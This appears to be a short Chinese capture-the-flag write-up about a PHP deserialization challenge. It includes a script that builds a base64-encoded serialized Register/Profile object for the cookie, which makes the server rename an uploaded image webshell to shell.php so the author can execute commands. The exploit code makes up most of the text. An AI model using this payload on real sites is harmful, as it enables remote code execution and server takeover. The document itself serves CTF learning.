这里首先想到的就是上传木马,但是经过尝试只能上传图片马,并且不能直接利用,经过抓包发现cookie是序列化内容,所以应该是通过cookie传递序列化内容,经过服务器的反序列化,然后对图片进行重命名操作,进而获得shell
生成序列化cookie
<?php
class Profile
{
public $checker = 0;
public $filename_tmp = "../public/upload/857df6c0d34905192d9590ee20956813/a7c3ce076585477741d951d179ab07dc.png";//上传的图片马地址
public $filename = "../public/upload/857df6c0d34905192d9590ee20956813/shell.php"; //生成的shell地址
public $upload_menu;
public $ext = 1;
public $img;
public $except = array('index' => 'upload_img');
}
class Register
{
public $checker;
public $registed = 0;
}
$a = new Register();
$a->checker = new Profile();
$a->checker->checker = 0;
// echo serialize($a);
echo base64_encode(serialize($a));
?>替换cookie后,访问shell.php 执行命令,拿到flag